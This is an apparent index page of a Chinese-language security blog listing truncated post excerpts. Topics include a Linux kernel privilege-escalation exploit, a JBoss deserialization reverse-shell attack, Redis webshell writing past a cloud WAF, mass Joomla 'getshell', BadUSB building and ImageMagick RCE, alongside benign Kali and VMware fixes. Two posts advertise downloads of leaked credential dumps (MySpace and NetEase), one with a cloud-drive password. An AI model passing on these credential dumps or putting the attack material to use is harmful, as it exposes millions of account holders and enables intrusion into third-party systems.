Menu

Ubuntu 16.04.4 exploit (tested on 4.4.0-116-generic )
我看到最近出的linux内核提权exp,立刻去官网下载了一个最新版本的16.04.4(时间:20180319) 内核:4.13.0-36 二话不说测试一下这个EXP,估计是失败的,内核版本太高,补丁肯定打了。 然后看一下EXP里面测试的内核版本,4.4.0-116。 果断去下载一个内核,换个姿势 再来一次。 [...]
DEDECMS找后台目录
阿里的先知社区写了一篇dedecms找后台目录的文章 并且给出了一个php版本的 传送门 原理和废话我不多说了 我直接上一个python版本 随便找一个dede的站来实验一下 http://www.hzxxgc.com/ 网站自己修改。 上代码: ##!/usr/bin/env python # [...]
处理器A级漏洞Meltdown(熔毁)和Spectre(幽灵)
概述 针对Google公司的Project [...]
利用Arduino制作BadUSB
之前我在打王者荣耀的时候,赢了一个badusb+secusb 就想这样: 关于badusb介绍网上有很多,我在这里不多说,直接说制作方法,freebuf上一篇文章制作方法有点小问题。 我这里更新一下,更完整版本。 准备材料: Arduino Leonardo //小型单片机模拟USB Arduino IDE [...]
CVE-2017-12149 JBOOSAS6.X 反序列化
漏洞地址:http://xxxxx:81/invoker/readonly 回显500 步骤1: javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java 步骤2: java -cp [...]
每日端口监测扫描
每日端口监测扫描(首发在土司) #!/bin/bash PATH="/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/root/bin" Time=`date +%Y%m%d` [...]
redis绕过云盾写webshell提权08服务器
半年多没写文章了。 第一部分拿webshell: 前不久,我们公司被大批肉鸡DDOS,攻击来源大约有几千个IP。 我随便选择了那么几十个打算追查一下攻击者。找到远控准备直接报警抓人。 我就随便选择其中一次追查攻击来源简单写一片日志吧。 扫描其中某一个IP [...]
kali linux2 4.9 版本内核 VMware-Workstation12.5.2 虚拟机无法启动解决办法
tar -xf /usr/lib/vmware/modules/source/vmmon.tar gedit vmmon-only/linux/hostif.c In vmmon-only/linux/hostif.c, around line 1162, change [...]
在线C段服务器信息查询
传送门1 传送门2  
kali linux 更新后Kernel 4.6VMWare Workstation无法启动的解决办法
需要安装vmware workstation12版本 安装完毕后 cd /usr/lib/vmware/modules/source 这里需要修改两个文件 1、vmmon.tar tar -xvf vmmon.tar gedit /vmmon-only/linux/hostif.c [...]
MySpace 4.27亿个密码泄漏(附下载链接)
网络安全领域有一个被屡屡提及的格言:公司分两种,一种是已经被黑客攻击的,一种,是还不知道已被攻击的 [...]
Stuxnet纪录片-零日 Zero.Days (2016)【中文字幕】
《零日》主要讲述了“震网”计算机蠕虫病毒攻击伊朗核设施的故事:为阻止伊朗核计划,美国等国不仅采取暗杀伊朗核专家等手段,还利用“震网”病毒攻击伊朗核设施,导致浓缩铀离心机转速失控…… [...]
VR版炉石传说
VR版炉石传说,应该很好玩
ImageMagick—-Remote Command Execute in WordPress 4.5.1
ImageMagick ImageMagick 昨天曝出 CVE-2016-3714,Java、PHP 的库也受其影响。其中 PHP 的库 Imagick 应用广泛,波及也大。Wordpress 也就是受此漏洞影响出现了 RCE。 这个漏洞很蠢,ImageMagick 在 [...]
一个稳定的UDP反向端口映射方法
使用到的工具 https://github.com/ring04h/udptunnel http://fuzz.wuyun.org/src/s5.py 原理实例图   编译可执行程序 server# git clone https://github.com/ring04h/udptunnel.git [...]
52G网易邮箱帐号密码
废话不多说。直接上图。上地址。 下载地址1:MEGA   下载地址2:百度网盘 密码:pt9j       最后附加一个在线查询网站   https://163password.download/        
Linux提权CVE-2016-0728漏洞的分析和利用
漏洞介绍 Perception Point研究团队发现了一个Linux内核的本地提权漏洞。虽然这个漏洞自2012年便已经存在,但Perception Point团队声称近期才发现这个漏洞,目前已经提交至内核安全团队,后续还会发布PoC利用代码。这个漏洞会影响到数以千万计的Linux [...]
kali 2.0 最新比较流畅的源
deb http://mirrors.aliyun.com/kali kali main non–free contrib deb–src http://mirrors.aliyun.com/kali kali main non–free contrib deb [...]
JOOMLA 1.5 – 3.4.5 远程代码执行之批量GETSHELL
看大家发的都是单打独斗的,我来献丑来个批量getshell的吧,不喜勿喷! 0X01 背景 近日,Joomla 1.5 – 3.4.5爆出了一个远程代码执行的漏洞,此洞可谓影响相当之大,各个安全机构都发布了漏洞的分析报告和POC,笔者就不在此赘述了,相关的漏洞分析参见: Joomla 对象注入漏洞分析报告 [...]
joomla rce简单分析
简单分析,混个脸熟,若有不足,请多多包涵。 首先看下官方补丁 https://github.com/PhilETaylor/Joomla1.5.999/commit/c47151932dd75d729b63cfc553345492a60a976d } /** -  * Do some checks for [...]